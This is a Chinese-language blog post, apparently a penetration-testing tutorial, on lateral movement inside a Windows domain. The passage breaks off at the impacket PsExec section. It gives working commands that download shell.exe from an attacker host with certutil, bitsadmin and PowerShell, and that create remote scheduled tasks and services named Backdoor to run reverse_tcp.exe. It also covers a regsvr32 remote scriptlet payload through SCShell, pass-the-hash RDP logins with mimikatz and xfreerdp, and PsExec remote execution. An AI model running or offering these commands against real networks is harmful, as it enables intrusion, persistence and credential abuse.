<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="横向移动"><meta name="keywords" content=""><meta name="author" content="Dar1in9"><meta name="copyright" content="Dar1in9"><title>横向移动 | Dar1in9's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"MY1GAADR9W","apiKey":"5032629da4e94f659d98a4052bc1c5cd","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.0.0'
} </script><meta name="generator" content="Hexo 6.0.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%9A%E8%BF%87Windows%E8%87%AA%E5%B8%A6%E5%B7%A5%E5%85%B7%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6"><span class="toc-number">1.</span> <span class="toc-text">通过Windows自带工具下载文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IPC%E8%BF%9E%E6%8E%A5%E5%92%8C%E6%96%87%E4%BB%B6%E5%85%B1%E4%BA%AB"><span class="toc-number">2.</span> <span class="toc-text">IPC连接和文件共享</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E6%A8%AA%E5%90%91"><span class="toc-number">3.</span> <span class="toc-text">计划任务横向</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%E6%A8%AA%E5%90%91"><span class="toc-number">4.</span> <span class="toc-text">系统服务横向</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E8%BF%9C%E7%A8%8B%E6%9C%8D%E5%8A%A1"><span class="toc-number">4.1.</span> <span class="toc-text">创建远程服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SCShell"><span class="toc-number">4.2.</span> <span class="toc-text">SCShell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2"><span class="toc-number">5.</span> <span class="toc-text">远程桌面</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#RDP-Hijack"><span class="toc-number">5.1.</span> <span class="toc-text">RDP Hijack</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sharp-RDP"><span class="toc-number">5.2.</span> <span class="toc-text">sharp RDP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8Hash%E7%99%BB%E5%BD%95rdp%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2"><span class="toc-number">5.3.</span> <span class="toc-text">利用Hash登录rdp远程桌面</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#RDP%E5%AE%A2%E6%88%B7%E7%AB%AF"><span class="toc-number">5.4.</span> <span class="toc-text">RDP客户端</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SMB%E5%8D%8F%E8%AE%AE%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">6.</span> <span class="toc-text">SMB协议的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#PSExec"><span class="toc-number">6.1.</span> <span class="toc-text">PSExec</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SMBExec"><span class="toc-number">6.2.</span> <span class="toc-text">SMBExec</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#wmi%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">7.</span> <span class="toc-text">wmi的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%84%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-number">7.1.</span> <span class="toc-text">常规利用方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7"><span class="toc-number">7.2.</span> <span class="toc-text">常见利用工具</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WMI%E4%BA%8B%E4%BB%B6%E8%AE%A2%E9%98%85%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">7.3.</span> <span class="toc-text">WMI事件订阅的利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DCOM%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">8.</span> <span class="toc-text">DCOM的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MMC20-Application"><span class="toc-number">8.1.</span> <span class="toc-text">MMC20.Application</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ShellWindows"><span class="toc-number">8.2.</span> <span class="toc-text">ShellWindows</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Excel-Application"><span class="toc-number">8.3.</span> <span class="toc-text">Excel.Application</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ShellBrowserWindow"><span class="toc-number">8.4.</span> <span class="toc-text">ShellBrowserWindow</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Impacket%E9%87%8C%E7%9A%84dcomexec-py%E8%84%9A%E6%9C%AC"><span class="toc-number">8.5.</span> <span class="toc-text">Impacket里的dcomexec.py脚本</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WinRM%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">9.</span> <span class="toc-text">WinRM的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87WinRM%E6%89%A7%E8%A1%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4"><span class="toc-number">9.1.</span> <span class="toc-text">通过WinRM执行远程命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Evil-Winrm"><span class="toc-number">9.2.</span> <span class="toc-text">Evil-Winrm</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/kakashi-cat.jpg"></div><div class="author-info__name text-center">Dar1in9</div><div class="author-info__description text-center">人间值得，未来可期</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/Dar1in9s">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">89</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">17</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">17</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://gryffinbit.top">Gryffinbit</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Dar1in9's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">横向移动</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-05-10</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">6.4k</span><span class="post-meta__separator">|</span><span>阅读时长: 24 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>在获得域内一台主机权限或账号权限之后，需要以此作为跳板，对域内主机进行进一步攻击，获取域内更多主机和账户的权限。</p>
<span id="more"></span>

<h2 id="通过Windows自带工具下载文件"><a href="#通过Windows自带工具下载文件" class="headerlink" title="通过Windows自带工具下载文件"></a>通过Windows自带工具下载文件</h2><p><strong>Certutil</strong><br>Certutil 是Windows自带的命令行工具，用于管理Windows证书并作为证书服务器的一部分安装。Certutil提供了从网络下载文件的功能。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil -urlcache -split -f http://192.168.1.1:8000/shell.exe c:\users\public\shell.exe</span><br></pre></td></tr></table></figure>

<p><strong>BITSAdmin</strong></p>
<p>BITSAdmin用于创建、下载和上传作业，监视其进度。Windows7及以后的系统自带BitsAdmin工具。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin /transfer test http://192.168.1.1:8000/shell.exe c:\users\public\shell.exe</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">创建一个名为<span class="built_in">test</span>的bitsadmin任务，下载shell.exe</span></span><br></pre></td></tr></table></figure>

<p><strong>powershell</strong></p>
<p>通过创建WebClient对象来实现文件下载</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(New-Object Net.WebClient).DownloadFile(&quot;http://192.168.1.1:8000/shell.exe&quot;, &quot;c:\users\public\shell.exe&quot;)</span><br><span class="line"></span><br><span class="line">powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&#x27;http://192.168.1.1:8000/shell.exe&#x27;,&#x27;c:\users\public\shell.exe&#x27;)&quot;</span><br></pre></td></tr></table></figure>


<h2 id="IPC连接和文件共享"><a href="#IPC连接和文件共享" class="headerlink" title="IPC连接和文件共享"></a>IPC连接和文件共享</h2><p>IPC是英文Internet Process Connection的缩写，可以理解为“命名管道”资源，它是Windows操作系统提供的一个通信基础，用来在两台计算机进程之间建立通信连接，而IPC后面的<code>$</code>是Windows系统所使用的隐藏符号，因此<code>IPC$</code>表示IPC共享，但是是隐藏的共享。</p>
<p>通过<code>IPC$</code>，一些网络程序的数据交换可以建立在IPC上面，实现远程访问和管理计算机。默认情况下IPC是共享的，除非手动删除<code>IPC$</code>。为了配合IPC共享工作，Windows操作系统在安装完成后，自动设置共享的目录为：C盘、D盘、…、ADMIN目录（<code>C:\Windows\</code>）等，即为<code>ADMIN$</code>、<code>C$</code>、<code>D$</code>等等，但要注意，这些共享是隐藏的，只有管理员能够对他们进行远程操作。</p>
<p>实战中往往会建立<code>IPC$</code>连接，因为通过<code>IPC$</code>连接，不仅可以进行所有文件共享操作，还可以实现其他远程管理操作，如列出远程主机进程、在远程主机上创建计划任务或服务等。</p>
<p>建立<code>IPC$</code>连接需要具备以下两个条件：<br>1、远程主机开启了IPC连接<br>2、远程主机的139端口和445端口开放</p>
<p><code>IPC$</code> 使用</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">net use                               # 查看本机建立的连接(本机连接其他机器)</span><br><span class="line">net use \\10.10.10.19\IPC$ &quot;password&quot; /user:&quot;Administrator&quot;    # 建立IPC连接</span><br><span class="line">net session                           # 查看本机建立的连接(其他机器连接的本机)，需要administrator用户执行</span><br><span class="line">net share                             # 查看本地开启的共享</span><br><span class="line">net share a=c:\                       # 新开一个共享连接</span><br><span class="line">net share ipc$                        # 开启ipc$共享</span><br><span class="line">net share ipc$ /del                   # 删除ipc$共享</span><br><span class="line">net share admin$ /del                 # 删除admin$共享</span><br><span class="line">net share c$ /del                     # 删除C盘共享</span><br><span class="line">net use * /del                        # 删除所有连接</span><br></pre></td></tr></table></figure>

<p>连接之后，就可以使用文件命令进行操作</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">dir \\10.10.10.19\C$</span><br><span class="line">copy ./shell.exe \\10.10.10.19\C$\Users\Public</span><br><span class="line">type \\192.168.1.131\c$\1.txt       # 查看目标C盘下1.txt文件内容</span><br><span class="line">net use h: \\192.168.52.138\c$              # 磁盘映射，将目标的 C 盘映射到本地的 H 盘</span><br><span class="line">net use h: /del                                             # 删除磁盘映射</span><br></pre></td></tr></table></figure>


<h2 id="计划任务横向"><a href="#计划任务横向" class="headerlink" title="计划任务横向"></a>计划任务横向</h2><p>可以通过已建立的IPC连接，在远程主机上创建计划任务，让目标主机在规定的时间或周期内执行特定操作。远程创建计划任务是通过<code>DCE/RPC</code>协议进行。</p>
<p>操作步骤：</p>
<p>1、利用已建立的IPC连接上传后门程序<br>2、利用已建立的IPC连接或指定用户凭据的方式在远程主机上创建计划任务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S 172.77.4.100 /TN Backdoor /SC minute /MO 1 /TR C:\users\pubilc\reverse_tcp.exe /RN System /F</span><br><span class="line"><span class="meta"># </span><span class="language-bash">/S 指定要连接的系统； /TN 指定计划任务的名称</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">/SC 指定计划任务执行频率；  /MO 指定计划任务执行周期</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">/TR 指定计划任务执行程序；  /RU 指定计划任务运行的用户权限</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">/F  如果指定的任务已存在，则强制创建</span></span><br></pre></td></tr></table></figure>
<p>如果没有建立IPC连接，则需要指定远程主机的用户凭据</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S 172.77.4.100 /TN Backdoor /SC minute /MO 1 /TR &quot;c:\windows\system32\cmd.exe /c &#x27;whoami&#x27; &gt; c:\users\public\result.txt&quot;  /RN System /F /U Administrator /P Admin@2016</span><br></pre></td></tr></table></figure>

<p>3、创建完成后，可以等待计划任务自行执行，也可以立即启动计划任务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /RUN /S 172.77.4.100 /I /TN Backdoor</span><br></pre></td></tr></table></figure>
<p>4、查看计划任务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /query /S 172.77.4.100 /TN Backdoor</span><br></pre></td></tr></table></figure>

<p>5、删除计划任务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Delete /S 172.77.4.100 /TN Backdoor /F</span><br></pre></td></tr></table></figure>

<p>也可以通过计划任务执行系统命令，将执行结果写入文件，然后使用type命令查看文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S 172.77.4.100 /TN Backdoor /SC minute /MO 1 /TR &quot;c:\windows\system32\cmd.exe /c &#x27;whoami&#x27; &gt; c:\users\public\result.txt&quot; /RN System /F</span><br><span class="line"></span><br><span class="line">type \\172.77.4.100\C$\users\public\result.txt</span><br></pre></td></tr></table></figure>

<p>可以直接使用UNC路径代替常规的本地路径，让目标主机直接在测试人员搭建的Smb共享中加载攻击载荷并执行。这样可以省去手动上传载荷的步骤。<br>例如：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S 172.77.4.100 /TN Backdoor /SC minute /MO 1 /TR \\192.168.100.100\mysmb\reverse_tcp.exe /RN System /F</span><br></pre></td></tr></table></figure>


<h2 id="系统服务横向"><a href="#系统服务横向" class="headerlink" title="系统服务横向"></a>系统服务横向</h2><h3 id="创建远程服务"><a href="#创建远程服务" class="headerlink" title="创建远程服务"></a>创建远程服务</h3><p>创建远程服务需要拥有<strong>两端主机的管理员权限</strong>和IPC连接，具体操作：</p>
<p>1、利用已建立的共享连接向远程主机上传攻击载荷<br>2、利用已建立的IPC连接在远程主机上创建系统服务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sc \\172.77.4.100 create Backdoor binpath= &quot;cmd.exe /k c:\users\public\reverse_tcp.exe&quot;</span><br><span class="line"><span class="meta"># </span><span class="language-bash">binpath的等号后面需要有一个空格</span></span><br><span class="line">```  </span><br><span class="line">3、启动服务</span><br><span class="line">```shell</span><br><span class="line">sc \\192.168.30.132 start Backdoor</span><br></pre></td></tr></table></figure>
<p>4、删除服务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc \\192.168.30.132 delete Backdoor</span><br></pre></td></tr></table></figure>

<h3 id="SCShell"><a href="#SCShell" class="headerlink" title="SCShell"></a>SCShell</h3><p><a target="_blank" rel="noopener" href="https://github.com/Mr-Un1k0d3r/SCShell">SCShell</a>是一款无文件横向移动的工具，主要依赖于<code>ChangeServiceConfigA</code>函数，用于修改 Windows 服务的配置，讲服务的二进制路径名修改为指定的程序或攻击载荷，然后重启服务。执行结束后，服务二进制文件路径讲恢复为原始路径。</p>
<p>该工具的优点在于它不会通过 SMB 协议去执行身份验证，该工具是通过 <code>DCE/RPC</code> 协议进行的。</p>
<p>SCShell需要提供远程主机的管理员权限用户的凭据，并且需要已知远程主机上的系统服务名称。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SCShell.exe 172.77.4.100 XblAuthManager &quot;C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i:http://172.77.4.129/payload.sct scrobj.dll&quot; dar.com administrastor Admin2016</span><br></pre></td></tr></table></figure>

<p>也有python版本的scshell，用到了impacket项目</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce</span><br><span class="line">Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation</span><br><span class="line"></span><br><span class="line">[*] Command need to use FULL path. No command output.</span><br><span class="line"><span class="meta">SCShell&gt;</span></span><br></pre></td></tr></table></figure>


<h2 id="远程桌面"><a href="#远程桌面" class="headerlink" title="远程桌面"></a>远程桌面</h2><p>远程桌面协议（Remote Desktop Protocol，RDP）</p>
<p>查询注册表确定是否主机开启了远程桌面</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">reg query &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">若字段值为0，则表示已启动RDP；若为1，则表示禁用RDP</span></span><br></pre></td></tr></table></figure>

<p>开启远程桌面</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">开启远程桌面</span></span><br><span class="line">reg add &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 0 /f</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">关闭“仅允许运行使用网络级别身份验证的远程桌面的计算机连接”（鉴权）</span></span><br><span class="line">reg add &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; /v UserAuthentication /t REG_DWORD /d 0 </span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">设置防火墙策略放行3389端口</span></span><br><span class="line">netsh advfirewall firewall add rule name=&quot;Remote Desktop&quot; protocol=TCP dir=in localport=3389 action=allow</span><br></pre></td></tr></table></figure>

<p>对于远程主机，可以通过WMI来开启远程桌面功能</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /Node:192.168.30.135 /User:Administrator /Password:Admin2012 RDTOGGLE WHRER ServerName=&#x27;win2016&#x27; call SetAllowTSConnections 1</span><br></pre></td></tr></table></figure>

<h3 id="RDP-Hijack"><a href="#RDP-Hijack" class="headerlink" title="RDP Hijack"></a>RDP Hijack</h3><p>Windows系统下，<code>tscon</code>可被用来切换远程桌面的会话。正常情况下，切换会话时需要提供登录密码，但通过特殊的利用方法能够绕过验证，不输入密码实现未授权登录。</p>
<p>可以通过<code>query user</code>来列出所有登录的用户列表，得到id</p>
<p>在SYSTEM权限下，使用<code>tscon &lt;ID&gt;</code>来切换用户不需要验证密码。</p>
<h3 id="sharp-RDP"><a href="#sharp-RDP" class="headerlink" title="sharp RDP"></a>sharp RDP</h3><p><a target="_blank" rel="noopener" href="https://github.com/0xthirteen/SharpRDP">https://github.com/0xthirteen/SharpRDP</a></p>
<p>sharp rdp可以通过远程桌面协议在远程主机上执行系统命令，且不需要GUI客户端。</p>
<p>工具需要远程主机开启远程桌面功能，且防火墙放行3389端口</p>
<h3 id="利用Hash登录rdp远程桌面"><a href="#利用Hash登录rdp远程桌面" class="headerlink" title="利用Hash登录rdp远程桌面"></a>利用Hash登录rdp远程桌面</h3><p>抓取hash无法破解的情况下，如果使用hash远程登录RDP，需要开启<code>Restricted Admin Mode</code>，在Windows8.1和Windows Server 2012R2上默认开启。</p>
<p><code>Restricted Admin mode</code>，直译为受限管理模式，主要功能是使得凭据不会暴露在目标系统中。<br>适用系统：<br>Windows 8.1和Windows Server 2012 R2默认支持该功能；<br>Windows 7和Windows Server 2008 R2默认不支持，需要安装补丁2871997、2973351</p>
<p>可以通过修改注册表开启：注册表位置：<code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa</code></p>
<p>新建<code>DWORD</code>键值<code>DisableRestrictedAdmin</code>，值为0代表开启，值为1代表关闭</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG ADD &quot;HKLM\System\CurrentControlSet\Control\Lsa&quot; /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f</span><br></pre></td></tr></table></figure>

<p>查看是否已开启 <code>DisableRestrictedAdmin</code>，<code>REG_DWORD 0x0</code>存在就是开启</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG query &quot;HKLM\System\CurrentControlSet\Control\Lsa&quot; | findstr &quot;DisableRestrictedAdmin&quot;</span><br></pre></td></tr></table></figure>

<p>可以使用impacket项目中的reg.py进行修改注册表</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">添加注册表项</span></span><br><span class="line">python reg.py &lt;domain&gt;/&lt;user&gt;@&lt;ip&gt; -hashes :&lt;hashe&gt; add -keyName &quot;HKLM\System\CurrentControlSet\Control\Lsa&quot; -v &quot;DisableRestrictedAdmin&quot; -vt &quot;REG_DWORD&quot; -vd &quot;0&quot;</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">查看注册表项</span></span><br><span class="line">python reg.py &lt;domain&gt;/&lt;user&gt;@&lt;ip&gt; -hashes :&lt;hashe&gt; add -keyName &quot;HKLM\System\CurrentControlSet\Control\Lsa&quot; -v &quot;DisableRestrictedAdmin&quot;</span><br></pre></td></tr></table></figure>

<p>之后使用xfreerdp来连接rdp</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xfreerdp /u:&lt;user&gt; /d:&lt;domain&gt; /pth:&lt;hash&gt; /v:ip /cert-ignore</span><br><span class="line">xfreerdp /u:Administrator /d:dar.com /pth:ac54ecea0c1d055abc1c7b3cfd960068 /v:172.77.4.100 </span><br></pre></td></tr></table></figure>


<p>或者使用mimikatz来pth</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">sekurlsa::pth /user:administrator /domain:dar.com /ntlm:ac54ecea0c1d055abc1c7b3cfd960068 &quot;/run:mstsc.exe /restrictedadmin&quot;</span><br></pre></td></tr></table></figure>

<h3 id="RDP客户端"><a href="#RDP客户端" class="headerlink" title="RDP客户端"></a>RDP客户端</h3><p>Linux：rdesktop、xfreerdp</p>
<h2 id="SMB协议的利用"><a href="#SMB协议的利用" class="headerlink" title="SMB协议的利用"></a>SMB协议的利用</h2><h3 id="PSExec"><a href="#PSExec" class="headerlink" title="PSExec"></a>PSExec</h3><p>psExec是微软官方提供的一个Windows远程控制工具，可以根据凭据在远程系统上执行管理操作，并且可以获得与命令行几乎相同的实时交互性。</p>
<p>PsExec的原理是通过SMB连接到服务端的<code>Admin$</code>共享，并释放名为”psexecsvc.exe”的二进制文件，然后注册名为”PSEXECSVC”服务。当客户端执行命令时，服务端通过PSEXECSVC服务启动相应的程序执行命令并回显数据。运行结束后，PSEXECSVC服务会被删除。</p>
<p>使用PSEXEC进行远程操作需要以下条件：<br>1、远程主机开启了<code>Admin$</code>共享<br>2、远程机器的 139 或 445 端口需要开启状态，即 SMB，且防火墙放行端口。<br>3、具备将文件写入共享文件夹的权限；<br>4、明文密码或者 NTLM 哈希；<br>5、能够在远程机器上创建服务：<code>SC_MANAGER_CREATE_SERVICE</code><br>6、能够启动所创建的服务：<code>SERVICE_QUERY_STATUS &amp;&amp; SERVICE_START</code></p>
<p>用法：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">psexec.exe -accepteula \\192.168.30.135 -u hackme\Administrator -p Admin2012 -s cmd.exe</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">-accepteula 禁止弹出许可证对话框</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">-s 以SYSTEM权限启动进程</span></span><br></pre></td></tr></table></figure>

<p>如果已经建立IPC连接，那么可以直接使用psexec连接远程主机</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">psexec.exe -accepteula \\192.168.30.135 -s cmd.exe</span><br></pre></td></tr></table></figure>
<p>psexec执行流程：<br>1、将<code>PSEXESVC.exe</code>上传到admin$共享文件夹内；<br>2、远程创建用于运行<code>PSEXESVC.exe</code>的服务；<br>3、远程启动服务。<br><code>PSEXESVC</code>服务充当一个重定向器（包装器）。它在远程系统上运行指定的可执行文件（示例中的cmd.exe），同时，它通过主机之间来重定向进程的输入&#x2F;输出（利用命名管道）。</p>
<p>impacket项目中也实现了psexec：</p>
